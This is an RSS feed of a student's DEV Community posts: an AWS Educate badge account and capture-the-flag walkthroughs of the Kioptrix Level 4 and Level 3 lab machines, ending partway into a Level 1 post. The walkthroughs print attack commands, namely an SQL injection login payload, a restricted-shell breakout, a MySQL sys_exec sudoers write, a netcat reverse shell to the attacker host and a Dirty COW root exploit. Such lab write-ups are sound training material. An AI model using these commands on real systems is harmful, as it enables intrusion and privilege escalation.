<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Muhammad Zain-Ul-Abdin</title>
    <description>The latest articles on DEV Community by Muhammad Zain-Ul-Abdin (@iamzsial).</description>
    <link>https://dev.to/iamzsial</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4021527%2Fb0906ec9-a537-46a1-bb83-272818a1e25e.jpeg</url>
      <title>DEV Community: Muhammad Zain-Ul-Abdin</title>
      <link>https://dev.to/iamzsial</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/iamzsial"/>
    <language>en</language>
    <item>
      <title>☁️ AWS Cloud 101 — Earning My First AWS Educate Badge</title>
      <dc:creator>Muhammad Zain-Ul-Abdin</dc:creator>
      <pubDate>Tue, 11 Aug 2026 08:43:41 +0000</pubDate>
      <link>https://dev.to/iamzsial/aws-cloud-101-earning-my-first-aws-educate-badge-45k7</link>
      <guid>https://dev.to/iamzsial/aws-cloud-101-earning-my-first-aws-educate-badge-45k7</guid>
      <description>&lt;p&gt;A walkthrough of how I earned my first AWS badge through AWS Educate and unlocked access to the AWS Emerging Talent Community, documented as I go through my transition from offensive security labs into cloud security.&lt;/p&gt;

&lt;p&gt;📖 Introduction&lt;br&gt;
I'd just wrapped up the last VulnHub machine in my Kioptrix run, and it was time to switch lanes. My goal was never SOC analyst work, it's cloud security engineering, and AWS Educate turned out to be the entry point almost everyone skips past on the way to a "real" certification. It doesn't hinge on one big exam. Instead it's a short chain of small unlocks: a free course, a passed assessment, a badge issued through a third party, and a community that sits behind all of it with resources most students never find on their own.&lt;/p&gt;

&lt;p&gt;This write-up documents that chain end to end, including the part where I sat around waiting for access that AWS says can take up to 72 hours to show up.&lt;/p&gt;

&lt;p&gt;🧰 Setup&lt;br&gt;
Component   Description&lt;br&gt;
Platform    AWS Educate (awseducate.com)&lt;br&gt;
Account Type    Student, free enrollment&lt;br&gt;
Prerequisites   Verifiable student email&lt;br&gt;
Target Badge    Introduction to Cloud 101&lt;br&gt;
Badge Issuer    Credly&lt;br&gt;
🎯 Objectives&lt;br&gt;
Enroll in AWS Educate with a verified student account&lt;br&gt;
Complete the Introduction to Cloud 101 course&lt;br&gt;
Pass the post-course assessment&lt;br&gt;
Confirm badge issuance through Credly&lt;br&gt;
Gain access to the AWS Emerging Talent Community&lt;br&gt;
Identify what the community actually unlocks for certification prep&lt;/p&gt;

&lt;p&gt;🗺️ Process Flow&lt;br&gt;
┌────────────────┐  ┌────────────────┐  ┌────────────────┐  ┌────────────────┐  ┌────────────────┐&lt;br&gt;
│ Enroll          │─▶│ Complete Course │─▶│ Pass Assessment │─▶│ Badge Issued    │─▶│ ETC Unlocked    │&lt;br&gt;
└────────────────┘  └────────────────┘  └────────────────┘  └────────────────┘  └────────────────┘&lt;/p&gt;

&lt;p&gt;🔍 Phase 1 — Enrollment&lt;br&gt;
Signing up for AWS Educate itself is straightforward, a free account tied to a verifiable student email. The part worth noting is that this single enrollment is the prerequisite for everything downstream. Skip it and none of the badge or community access exists.&lt;/p&gt;

&lt;p&gt;Why it matters: AWS Educate isn't the certification, it's the gate in front of the gate. Treating it as a formality is how people miss the voucher system entirely.&lt;/p&gt;

&lt;p&gt;📚 Phase 2 — Introduction to Cloud 101&lt;br&gt;
The course itself runs around 8 hours if you go through it properly rather than skimming for the assessment answers. It covers what cloud computing actually is, core AWS services, and hands-on lab time in a sandbox where you build a genuinely simple cloud application from scratch.&lt;/p&gt;

&lt;p&gt;It's not deep. It's not meant to be. But it's also not fluff, you come out with an actual working sense of how AWS structures its services, which matters more than it sounds like it should right before specializing in securing that same infrastructure.&lt;/p&gt;

&lt;p&gt;🔑 Phase 3 — Assessment and Badge Issuance&lt;br&gt;
Finishing the course material isn't the same as earning the badge, there's a post-course assessment that has to be passed first. Once it clears, AWS doesn't hand the badge over instantly. It routes through Credly, and an email lands once the badge is actually ready to claim.&lt;/p&gt;

&lt;p&gt;Lesson: A "completed" course and an "earned" badge are two different states here. Don't assume you're done the moment the last lab closes.&lt;/p&gt;

&lt;p&gt;🚪 Phase 4 — Emerging Talent Community Access&lt;br&gt;
This is the part that caught me off guard the first time. Badge in hand, I expected instant access to the AWS Emerging Talent Community (ETC). Instead, AWS states it can take up to 72 hours for that access to actually appear in the account navigation.&lt;/p&gt;

&lt;p&gt;Once it does show up, the ETC turns out to be more than a title on a profile. It includes AWS certification prep resources, mentorship opportunities, and a points system redeemable for swag and, more usefully, certification vouchers. Some cycles have run 100% free vouchers for Foundational and Associate-level exams once enough points are banked, alongside a separate AI Practitioner promo running through a code (AIF2CLOUD) for anyone going that route.&lt;/p&gt;

&lt;p&gt;Why it matters: for a student paying in rupees against exams priced in dollars, the ETC's voucher system is the actual reason to bother with Cloud 101 at all, the badge itself is just the key.&lt;/p&gt;

&lt;p&gt;🧠 Skills Practiced&lt;br&gt;
AWS Educate Platform Navigation&lt;br&gt;
Cloud Fundamentals (Introduction to Cloud 101 curriculum)&lt;br&gt;
Sandbox Lab Environment Usage&lt;br&gt;
Credly Badge Verification&lt;br&gt;
AWS Emerging Talent Community Onboarding&lt;/p&gt;

&lt;p&gt;📚 Lessons Learned&lt;br&gt;
Free tiers aren't always the shortcut they look like. Cloud 101 feels like a formality, but it's the only path into the ETC's voucher system, which ended up mattering more than the course content itself.&lt;/p&gt;

&lt;p&gt;Waiting periods are part of the process, not a bug. The 72-hour ETC delay isn't documented loudly anywhere, budgeting for it up front avoids a false assumption that something broke.&lt;/p&gt;

&lt;p&gt;A badge and a certification are not the same milestone. Cloud 101 doesn't replace CLF-C02 or SCS-C02, it's a prerequisite move that makes the real certifications cheaper and better supported to pursue.&lt;/p&gt;

&lt;p&gt;Hands-on labs still beat passive reading. The 8-hour course's sandbox time did more for my actual AWS fluency than the reading material around it.&lt;/p&gt;

&lt;p&gt;💭 Conclusion&lt;br&gt;
Cloud 101 isn't where the real cloud security work starts, but it's where the actual roadmap starts. My cert plan runs SC-900 now, AWS Cloud Practitioner next, then SC-200, AZ-500, and eventually AWS Security Specialty. None of that changes because of this badge. What changes is how much of it I can afford to attempt, and how much support exists around each attempt, because of what a few hours of "basic" course content unlocked.&lt;/p&gt;

&lt;p&gt;If you're a fellow cybersecurity student deciding whether the AWS Educate track is worth bothering with before jumping straight into paid certs: yes. Do it. The badge takes a handful of hours. What it opens up afterward is worth more than the course itself.&lt;/p&gt;

&lt;p&gt;🔗 References&lt;br&gt;
AWS Educate&lt;br&gt;
Introduction to Cloud 101&lt;br&gt;
Credly&lt;br&gt;
AWS Emerging Talent Community&lt;br&gt;
AWS Serverless Security Architecture (my own project, built alongside this track)&lt;/p&gt;

&lt;p&gt;👤 Author&lt;br&gt;
Zain Sial&lt;br&gt;
Cybersecurity Student&lt;br&gt;
🔗 GitHub: github.com/zainsial866&lt;br&gt;
🔗 Portfolio: zainsial866.github.io&lt;br&gt;
🔗 LinkedIn: linkedin.com/in/iamzsial&lt;/p&gt;

</description>
      <category>aws</category>
      <category>beginners</category>
      <category>cloud</category>
      <category>security</category>
    </item>
    <item>
      <title>🛡️ Kioptrix Level 4 — Full Walkthrough</title>
      <dc:creator>Muhammad Zain-Ul-Abdin</dc:creator>
      <pubDate>Thu, 06 Aug 2026 10:55:27 +0000</pubDate>
      <link>https://dev.to/iamzsial/kioptrix-level-4-full-walkthrough-52jg</link>
      <guid>https://dev.to/iamzsial/kioptrix-level-4-full-walkthrough-52jg</guid>
      <description>&lt;p&gt;A technical walkthrough documenting my approach to solving the Kioptrix Level 4 vulnerable machine in a controlled lab environment.&lt;/p&gt;

&lt;p&gt;📖 Introduction&lt;br&gt;
Kioptrix Level 4 doesn't hinge on one dramatic exploit the way earlier levels do. Instead it chains together several smaller access-control and input-validation failures: a login form that reacts to SQL injection but doesn't fully cave to it, a directory listing that leaks application source, a parameter that discloses another user's password outright, a restricted shell around SSH access, and a MySQL UDF that turns a database login into root.&lt;/p&gt;

&lt;p&gt;This write-up follows that chain end to end, including the dead end that came before the actual way in.&lt;/p&gt;

&lt;p&gt;⚠️ Disclaimer This walkthrough was completed in an isolated lab environment on an intentionally vulnerable virtual machine. It is shared for educational and defensive learning purposes only.&lt;/p&gt;

&lt;p&gt;🖥️ Lab Environment&lt;br&gt;
Component   Description&lt;br&gt;
Attacker Machine    Kali Linux&lt;br&gt;
Target Machine  Kioptrix Level 4 (172.30.46.33)&lt;br&gt;
Virtualization  VMware Workstation&lt;br&gt;
Network Private Virtual Network&lt;br&gt;
🎯 Objectives&lt;br&gt;
Discover the target host and exposed services&lt;br&gt;
Enumerate the web login application&lt;br&gt;
Identify and exploit an authentication or access-control flaw&lt;br&gt;
Obtain valid credentials&lt;br&gt;
Gain SSH access and escape any restricted shell in place&lt;br&gt;
Escalate privileges to root&lt;br&gt;
Document findings professionally&lt;br&gt;
🗺️ Assessment Flow&lt;br&gt;
┌────────────────┐  ┌────────────────┐  ┌────────────────┐  ┌────────────────┐  ┌────────────────┐  ┌────────────────┐&lt;br&gt;
│ Reconnaissance  │─▶│ SQLi Login      │─▶│ IDOR Password   │─▶│ Restricted SSH  │─▶│ Shell Breakout  │─▶│ Privilege Esc.  │&lt;br&gt;
└────────────────┘  └────────────────┘  └────────────────┘  └────────────────┘  └────────────────┘  └────────────────┘&lt;br&gt;
🔍 Phase 1 — Reconnaissance&lt;br&gt;
Host discovery on the lab network was done with arp-scan:&lt;/p&gt;

&lt;p&gt;sudo arp-scan --localnet&lt;br&gt;
arp-scan results&lt;/p&gt;

&lt;p&gt;This identified the target at 172.30.46.33. A full Nmap service scan followed:&lt;/p&gt;

&lt;p&gt;Port    Protocol    Service Version&lt;br&gt;
22  tcp ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)&lt;br&gt;
80  tcp http    Apache httpd 2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch&lt;br&gt;
139 tcp netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)&lt;br&gt;
445 tcp netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)&lt;br&gt;
Nmap port scan results&lt;/p&gt;

&lt;p&gt;Key findings:&lt;/p&gt;

&lt;p&gt;A web application on port 80, alongside SSH and Samba&lt;br&gt;
Old Apache/PHP/Samba versions consistent with the rest of the Kioptrix series&lt;br&gt;
The web app was the most promising entry point to start with&lt;br&gt;
🌐 Phase 2 — Web Application Enumeration&lt;br&gt;
Browsing to the target presented a "LigGoat" member login form:&lt;/p&gt;

&lt;p&gt;LigGoat member login page&lt;/p&gt;

&lt;p&gt;The natural first move against any login form is testing for SQL injection. A classic authentication-bypass payload was tried in the login fields:&lt;/p&gt;

&lt;p&gt;Username: john&lt;br&gt;
Password: ' or 1=1 #&lt;br&gt;
SQL injection attempt returning wrong credentials&lt;/p&gt;

&lt;p&gt;This particular payload didn't bypass the login — the application returned "Wrong Username or Password." The query was clearly being touched by the input (a naive concatenation would normally fall to ' or 1=1 #), but this form wasn't giving up that easily, so it was worth widening the enumeration rather than brute-forcing SQLi payloads blindly.&lt;/p&gt;

&lt;p&gt;Why it matters: A login form resisting one canned SQLi payload doesn't mean the application is safe — it can just mean the real weakness is somewhere else on the same site.&lt;/p&gt;

&lt;p&gt;📂 Phase 3 — Directory Listing Disclosure&lt;br&gt;
Poking at the application's directory structure turned up an exposed, browsable directory:&lt;/p&gt;

&lt;p&gt;Directory listing of /robert exposing robert.php&lt;/p&gt;

&lt;p&gt;Index of /robert was accessible directly, listing robert.php — a file that should not have been enumerable or servable as a directory listing. This is a classic Apache misconfiguration (missing Options -Indexes) leaking the existence and layout of application-internal files that were never meant to be browsed directly.&lt;/p&gt;

&lt;p&gt;With a username (robert) now surfaced from the directory name itself, and the login form confirmed to be database-backed, the login form was retried with valid-looking values for the john account instead, using the credentials referenced by the app's own logic:&lt;/p&gt;

&lt;p&gt;Successful login as john&lt;/p&gt;

&lt;p&gt;The login succeeded, confirming john as a valid application account.&lt;/p&gt;

&lt;p&gt;🔑 Phase 4 — IDOR Password Disclosure&lt;br&gt;
Once authenticated, the application exposed a member control panel. Rather than trusting session state alone, the panel accepted a username parameter directly in the URL:&lt;/p&gt;

&lt;p&gt;&lt;a href="http://172.30.46.33/member.php?username=john" rel="noopener noreferrer"&gt;http://172.30.46.33/member.php?username=john&lt;/a&gt;&lt;br&gt;
IDOR disclosing john's plaintext password&lt;/p&gt;

&lt;p&gt;The page rendered the corresponding account's password in cleartext:&lt;/p&gt;

&lt;p&gt;Username : john&lt;br&gt;
Password : MyNameIsJohn&lt;br&gt;
This is a textbook Insecure Direct Object Reference (IDOR) — the application authorized the request based on being logged in at all, not on whether the logged-in user actually owned the username being requested. Any authenticated session could pull any other account's credentials just by changing the parameter.&lt;/p&gt;

&lt;p&gt;Why it matters: Authentication answers "who are you?" — authorization has to separately answer "are you allowed to see this specific record?" This app only ever asked the first question.&lt;/p&gt;

&lt;p&gt;🔓 Phase 5 — SSH Access and Restricted Shell&lt;br&gt;
With john:MyNameIsJohn in hand, SSH access was attempted:&lt;/p&gt;

&lt;p&gt;SSH login landing in a restricted LigGoat shell&lt;/p&gt;

&lt;p&gt;$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa &lt;a href="mailto:john@172.30.46.33"&gt;john@172.30.46.33&lt;/a&gt;&lt;br&gt;
&lt;a href="mailto:john@172.30.46.33"&gt;john@172.30.46.33&lt;/a&gt;'s password:&lt;br&gt;
Welcome to LigGoat Security Systems - We are Watching&lt;br&gt;
== Welcome LigGoat Employee ==&lt;br&gt;
LigGoat Shell is in place so you  don't screw up&lt;br&gt;
Type '?' or 'help' to get the list of allowed commands&lt;br&gt;
john:~$ ?&lt;br&gt;
cd  clear  echo  exit  help  ll  lpath  ls&lt;br&gt;
The login succeeded, but landed in a heavily restricted shell (lshell) exposing only a small allowlist of commands — no whoami, no bash, no direct command execution.&lt;/p&gt;

&lt;p&gt;🚪 Phase 6 — Restricted Shell Breakout&lt;br&gt;
lshell allowlists commands, not the full expressiveness of the tools it does allow. echo was still available, and critically the shell evaluates certain patterns through Python — which meant a Python builtin could be smuggled through:&lt;/p&gt;

&lt;p&gt;lshell breakout via os.system&lt;/p&gt;

&lt;p&gt;john:~$ echo os.system('/bin/bsh')&lt;br&gt;
sh: /bin/bsh: not found&lt;br&gt;
sh: Syntax error: "(" unexpected&lt;br&gt;
john:~$ echo os.system('/bin/bash')&lt;br&gt;
john@Kioptrix4:~$ whoami&lt;br&gt;
john&lt;br&gt;
The first attempt had a typo (/bin/bsh); correcting it to /bin/bash broke out of the restricted lshell environment entirely and dropped into a normal interactive Bash shell as john.&lt;/p&gt;

&lt;p&gt;Lesson: Restricting a shell to an allowlist of commands doesn't help if one of the allowed commands is itself an interpreter (or gets evaluated by one) capable of spawning an arbitrary process.&lt;/p&gt;

&lt;p&gt;🔑 Phase 7 — Privilege Escalation via MySQL UDF&lt;br&gt;
With a real shell, local privilege escalation avenues were explored. MySQL was reachable with no root password configured:&lt;/p&gt;

&lt;p&gt;mysql -u root&lt;br&gt;
A sys_exec() user-defined function (UDF) was already present on this MySQL install — a known Kioptrix Level 4 setup used to demonstrate UDF-based command execution as the MySQL service account (commonly root-equivalent in this lab):&lt;/p&gt;

&lt;p&gt;First sudoers write attempt failing with a syntax error&lt;/p&gt;

&lt;p&gt;mysql&amp;gt; SELECT sys_exec('echo "john ALL=(ALL:ALL) ALL" &amp;gt;&amp;gt; /etc/sudoers');&lt;br&gt;
mysql&amp;gt; quit&lt;br&gt;
john@Kioptrix4:/var/www$ sudo su&lt;/p&gt;

&lt;blockquote&gt;
&lt;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;sudoers file: syntax error, line 25 &amp;lt;&amp;lt;&amp;lt;&lt;br&gt;
sudo: parse error in /etc/sudoers near line 25&lt;br&gt;
The first attempt appended a malformed line directly into /etc/sudoers, corrupting it and breaking sudo entirely (the shell-quoting around the embedded " characters didn't survive intact). The fix was to write a properly quoted rule into a drop-in file under /etc/sudoers.d/ instead — the standard, syntax-isolated way sudoers rules are meant to be added — and set the permissions sudoers.d requires:&lt;/p&gt;
&lt;/blockquote&gt;


&lt;/blockquote&gt;
&lt;br&gt;
&lt;/blockquote&gt;

&lt;p&gt;Corrected sudoers.d write followed by successful sudo su to root&lt;/p&gt;

&lt;p&gt;mysql&amp;gt; SELECT sys_exec('echo "john ALL=(ALL:ALL) ALL" &amp;gt; /etc/sudoers.d/john &amp;amp;&amp;amp; chmod 440 /etc/sudoers.d/john');&lt;br&gt;
mysql&amp;gt; quit&lt;br&gt;
john@Kioptrix4:/var/www$ sudo su&lt;br&gt;
[sudo] password for john:&lt;br&gt;
root@Kioptrix4:/var/www# whoami&lt;br&gt;
root&lt;br&gt;
sudo su now succeeded, and whoami confirmed full root access.&lt;/p&gt;

&lt;p&gt;🧠 Skills Practiced&lt;br&gt;
Network Reconnaissance (arp-scan, Nmap)&lt;br&gt;
Web Login Form Enumeration and SQL Injection Testing&lt;br&gt;
Directory Listing / Information Disclosure Identification&lt;br&gt;
Insecure Direct Object Reference (IDOR) Exploitation&lt;br&gt;
Restricted Shell (lshell) Breakout&lt;br&gt;
MySQL User-Defined Function Abuse&lt;br&gt;
Linux sudoers / sudoers.d Mechanics&lt;br&gt;
Technical Documentation&lt;br&gt;
📚 Lessons Learned&lt;br&gt;
A resisted SQLi payload isn't the same as a secure form. The login form pushed back on one canned payload, but a directory-listing leak on the same application handed over everything the injection was trying to reach.&lt;/p&gt;

&lt;p&gt;IDOR vulnerabilities hide in plain sight. member.php?username=john looked like an ordinary parameter, but the app never checked whether the logged-in user actually owned the account being requested.&lt;/p&gt;

&lt;p&gt;Restricted shells need to restrict the right thing. lshell's allowlist blocked obvious commands like bash, but echo combined with Python evaluation of os.system() was enough to defeat it completely.&lt;/p&gt;

&lt;p&gt;A stray UDF is a loaded gun. sys_exec() sitting on a reachable MySQL instance turned "I have database credentials" into "I have root," with no additional vulnerability required.&lt;/p&gt;

&lt;p&gt;sudoers should never be edited with a raw &amp;gt;&amp;gt; and a shell one-liner. The first attempt corrupted the file and broke sudo system-wide until a properly isolated sudoers.d entry replaced it — a good reminder that even the "exploit succeeded" step can go wrong if the mechanics aren't respected.&lt;/p&gt;

&lt;p&gt;💭 Conclusion&lt;br&gt;
Kioptrix Level 4 didn't come down to a single CVE — it came down to a chain of ordinary web application mistakes (an over-permissive directory, a missing per-record authorization check) feeding into a chain of ordinary system mistakes (a leftover UDF, a restricted shell with a gap). Individually, several of these findings look minor. Chained together, they're a full compromise.&lt;/p&gt;

&lt;p&gt;🔗 References&lt;br&gt;
arp-scan&lt;br&gt;
Nmap&lt;br&gt;
SQL Injection (authentication bypass testing)&lt;br&gt;
Insecure Direct Object Reference (IDOR / OWASP A01: Broken Access Control)&lt;br&gt;
lshell restricted shell&lt;br&gt;
MySQL User-Defined Functions (sys_exec)&lt;br&gt;
Kioptrix Level 4 Documentation&lt;br&gt;
👤 Author&lt;br&gt;
Zain Sial Cybersecurity Student 🔗 GitHub: github.com/zainsial866&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Kioptrix Level 3 — When Metasploit Fails, Go Manual (LotusCMS RCE Dirty COW)</title>
      <dc:creator>Muhammad Zain-Ul-Abdin</dc:creator>
      <pubDate>Tue, 04 Aug 2026 08:12:24 +0000</pubDate>
      <link>https://dev.to/iamzsial/kioptrix-level-3-when-metasploit-fails-go-manual-lotuscms-rce-dirty-cow-3d3m</link>
      <guid>https://dev.to/iamzsial/kioptrix-level-3-when-metasploit-fails-go-manual-lotuscms-rce-dirty-cow-3d3m</guid>
      <description>&lt;p&gt;🛡️ Kioptrix Level 3 — Full Walkthrough&lt;/p&gt;

&lt;p&gt;Kioptrix Level 3 is the third machine in the Kioptrix series, and it's the first one where the fastest path in isn't a network service — it's the web application itself. This one also taught me a lesson that doesn't show up in most walkthroughs: what to do when the "excellent"-rated Metasploit module for a confirmed vulnerability just... doesn't work.&lt;/p&gt;

&lt;p&gt;⚠️ Disclaimer: This walkthrough was completed against an intentionally vulnerable virtual machine in an isolated lab environment, for educational purposes only.&lt;/p&gt;

&lt;p&gt;🖥️ Lab Setup&lt;br&gt;
Component   Description&lt;br&gt;
Attacker    Kali Linux (172.20.8.57)&lt;br&gt;
Target  Kioptrix Level 3 (172.20.13.53)&lt;br&gt;
Virtualization  VMware Workstation&lt;br&gt;
🔍 Recon&lt;/p&gt;

&lt;p&gt;Standard start — Nmap against the target:&lt;/p&gt;

&lt;p&gt;text&lt;br&gt;
PORT   STATE SERVICE VERSION&lt;br&gt;
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)&lt;br&gt;
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)&lt;/p&gt;

&lt;p&gt;Only two services this time. The HTTP title — "Ligoat Security - Got Goat? Security ..." — made it obvious there was a real application behind port 80, not a default page.&lt;/p&gt;

&lt;p&gt;🧩 Finding the Real Target: LotusCMS&lt;/p&gt;

&lt;p&gt;Checking Searchsploit against the raw service versions (OpenSSH 4.7, Apache 2.2.8) didn't turn up anything directly usable. That's a dead end worth recognizing quickly — server banners aren't always the actual attack surface.&lt;/p&gt;

&lt;p&gt;Viewing the page source instead told the real story:&lt;/p&gt;

&lt;p&gt;html&lt;br&gt;
&lt;/p&gt;
&lt;li&gt;Proudly Powered by: &lt;a href="http://www.lotuscms.org" rel="noopener noreferrer"&gt;LotusCMS&lt;/a&gt;
&lt;/li&gt;


&lt;p&gt;The site was running LotusCMS 3.0 — a much more specific and researchable target than a generic Apache version number.&lt;/p&gt;

&lt;p&gt;🛠️ The Metasploit Dead End&lt;/p&gt;

&lt;p&gt;LotusCMS 3.0 has a well-known eval()-based remote code execution vulnerability, and Metasploit has a module for it:&lt;/p&gt;

&lt;p&gt;text&lt;br&gt;
exploit/multi/http/lcms_php_exec   2011-03-03   excellent   LotusCMS 3.0 eval() Remote Command Execution&lt;/p&gt;

&lt;p&gt;"Excellent" rank, exact version match, options configured correctly. I ran it:&lt;/p&gt;

&lt;p&gt;text&lt;br&gt;
msf exploit(multi/http/lcms_php_exec) &amp;gt; run&lt;br&gt;
[&lt;em&gt;] Started reverse TCP handler on 172.20.8.57:5555&lt;br&gt;
[&lt;/em&gt;] Using found page param: /index.php?page=index&lt;br&gt;
[&lt;em&gt;] Sending exploit ...&lt;br&gt;
[&lt;/em&gt;] Exploit completed, but no session was created.&lt;/p&gt;

&lt;p&gt;Ran it again. Same result.&lt;/p&gt;

&lt;p&gt;This is the part most walkthroughs skip past — but it's the actually useful lesson. A module rated "excellent," targeting the exact confirmed CMS version, still didn't create a session. That doesn't mean the vulnerability isn't real. It means the module isn't handling something about this specific target correctly (payload staging, PHP version quirks, whatever it may be), and it was time to stop retrying and start understanding.&lt;/p&gt;

&lt;p&gt;🚪 Going Manual&lt;/p&gt;

&lt;p&gt;The underlying flaw is straightforward once you look at it: LotusCMS's router() function passes a page request parameter into eval() without sanitization. A public proof-of-concept script (lotusRCE.sh by Hood3dRob1n) automates confirming and exploiting exactly that.&lt;/p&gt;

&lt;p&gt;text&lt;br&gt;
$ ./lotusRCE.sh 172.20.13.53 /&lt;br&gt;
Path found, now to check for vuln....&lt;br&gt;
Regex found, site is vulnerable to PHP Code Injection!&lt;br&gt;
About to try and inject reverse shell....&lt;br&gt;
what IP to use? 172.20.8.57&lt;br&gt;
What PORT? 4444&lt;/p&gt;

&lt;p&gt;OK, open your local listener and choose the method for back connect:&lt;br&gt;
1) NetCat -e&lt;br&gt;
2) NetCat /dev/tcp&lt;br&gt;
3) NetCat Backpipe&lt;br&gt;
4) NetCat FIFO&lt;br&gt;
5) Exit&lt;/p&gt;

&lt;h1&gt;
  
  
  ? 2
&lt;/h1&gt;

&lt;p&gt;With a listener running:&lt;/p&gt;

&lt;p&gt;text&lt;br&gt;
$ nc -lvnp 4444&lt;br&gt;
listening on [any] 4444 ...&lt;br&gt;
connect to [172.20.8.57] from (UNKNOWN) [172.20.13.53] 51895&lt;br&gt;
$ whoami&lt;br&gt;
www-data&lt;/p&gt;

&lt;p&gt;Same vulnerability, same target, manual exploitation — and it worked immediately.&lt;/p&gt;

&lt;p&gt;⚠️ Stabilizing the Shell&lt;/p&gt;

&lt;p&gt;A raw netcat reverse shell is awkward to work with, so the first move after landing was upgrading it to a real TTY:&lt;/p&gt;

&lt;p&gt;bash&lt;br&gt;
python -c 'import pty; pty.spawn("/bin/sh")'&lt;/p&gt;

&lt;p&gt;Then basic enumeration:&lt;/p&gt;

&lt;p&gt;text&lt;br&gt;
www-data@Kioptrix3:~$ uname -a&lt;br&gt;
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux&lt;/p&gt;

&lt;p&gt;www-data@Kioptrix3:~$ cat /etc/*release&lt;br&gt;
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"&lt;/p&gt;

&lt;p&gt;A 2009 kernel is old enough to be interesting for privilege escalation — and it turned out to be vulnerable to one of the most famous Linux kernel bugs ever disclosed.&lt;/p&gt;

&lt;p&gt;🔑 Root via Dirty COW&lt;/p&gt;

&lt;p&gt;CVE-2016-5195, "Dirty COW," is a race condition in how the kernel handles copy-on-write memory. It lets a local user write to memory mappings that should be read-only — including files like /etc/passwd.&lt;/p&gt;

&lt;p&gt;The /etc/passwd-method exploit compiles cleanly on-target:&lt;/p&gt;

&lt;p&gt;bash&lt;br&gt;
gcc -pthread dirty.c -o dirty -lcrypt&lt;br&gt;
./dirty&lt;br&gt;
text&lt;br&gt;
/etc/passwd successfully backed up to /tmp/passwd.bak&lt;br&gt;
Please enter the new password: 1234&lt;br&gt;
Complete line:&lt;br&gt;
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash&lt;/p&gt;

&lt;p&gt;Done! Check /etc/passwd to see if the new user was created.&lt;br&gt;
You can log in with the username 'firefart' and the password '1234'.&lt;/p&gt;

&lt;p&gt;It patches /etc/passwd in place, adding a new UID-0 user with a password you set — after backing up the original so it can be restored.&lt;/p&gt;

&lt;p&gt;text&lt;br&gt;
$ su firefart&lt;br&gt;
Password: 1234&lt;br&gt;
firefart@Kioptrix3:/tmp# whoami&lt;br&gt;
firefart&lt;br&gt;
firefart@Kioptrix3:/tmp# cat /etc/shadow&lt;br&gt;
root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::&lt;br&gt;
...&lt;/p&gt;

&lt;p&gt;Reading /etc/shadow — root-only — confirmed full compromise.&lt;/p&gt;

&lt;p&gt;🧠 What This One Actually Taught Me&lt;br&gt;
Fingerprint the application, not just the server. The Apache/PHP version numbers were a dead end. The CMS name buried in the page footer was the real lead.&lt;br&gt;
A failed exploit module isn't proof of anything. If a high-confidence, version-matched module doesn't create a session, that's a prompt to understand the vulnerability well enough to reproduce it manually — not a signal to move on.&lt;br&gt;
Shell stabilization matters. pty.spawn turned a fragile raw shell into something I could actually work in.&lt;br&gt;
Old kernels don't expire. Dirty COW was disclosed in 2016. It still worked flawlessly against a kernel from 2009, running on a lab machine years later. Patch lag is the whole story here.&lt;br&gt;
🔗 References&lt;br&gt;
LotusCMS RCE script: &lt;a href="https://github.com/Hood3dRob1n/LotusCMS-Exploit" rel="noopener noreferrer"&gt;https://github.com/Hood3dRob1n/LotusCMS-Exploit&lt;/a&gt;&lt;br&gt;
Dirty COW (CVE-2016-5195): &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2016-5195" rel="noopener noreferrer"&gt;https://nvd.nist.gov/vuln/detail/CVE-2016-5195&lt;/a&gt;&lt;br&gt;
Full writeup + report + findings: github.com/zainsial866&lt;/p&gt;

&lt;p&gt;Zain Sial Cybersecurity Student 🔗 GitHub: github.com/zainsial866&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>ctf</category>
      <category>pentesting</category>
      <category>linux</category>
    </item>
    <item>
      <title>Kioptrix Level 1 - My First Legacy Linux Penetration Testing Lab</title>
      <dc:creator>Muhammad Zain-Ul-Abdin</dc:creator>
      <pubDate>Sat, 01 Aug 2026 08:57:58 +0000</pubDate>
      <link>https://dev.to/iamzsial/kioptrix-level-1-my-first-legacy-linux-penetration-testing-lab-5861</link>
      <guid>https://dev.to/iamzsial/kioptrix-level-1-my-first-legacy-linux-penetration-testing-lab-5861</guid>
      <description>&lt;p&gt;🔓 Kioptrix Level 1: My First Legacy Linux Penetration Testing Lab&lt;/p&gt;

&lt;p&gt;Category: Learning Log Difficulty: Beginner Target: Kioptrix Level 1 (VulnHub)&lt;/p&gt;

&lt;p&gt;🧭 Introduction&lt;/p&gt;

&lt;p&gt;Kioptrix Level 1 is one of the classic boot-to-root VMs used to practice penetration testing fundamentals in a controlled lab environment. The software is intentionally ancient, but that's exactly the point — it strips away complexity so you can focus on process: recon, enumeration, vulnerability research, exploitation, and privilege escalation, without distractions.&lt;/p&gt;

&lt;p&gt;This isn't a step-by-step command dump. I wanted to document the thought process behind each phase instead — what I was thinking, what tripped me up, and what it taught me.&lt;/p&gt;

&lt;p&gt;🖥️ Lab Environment&lt;br&gt;
┌─────────────┐         ┌──────────────────┐&lt;br&gt;
│  Kali Linux │ ───────▶│  Kioptrix Level 1 │&lt;br&gt;
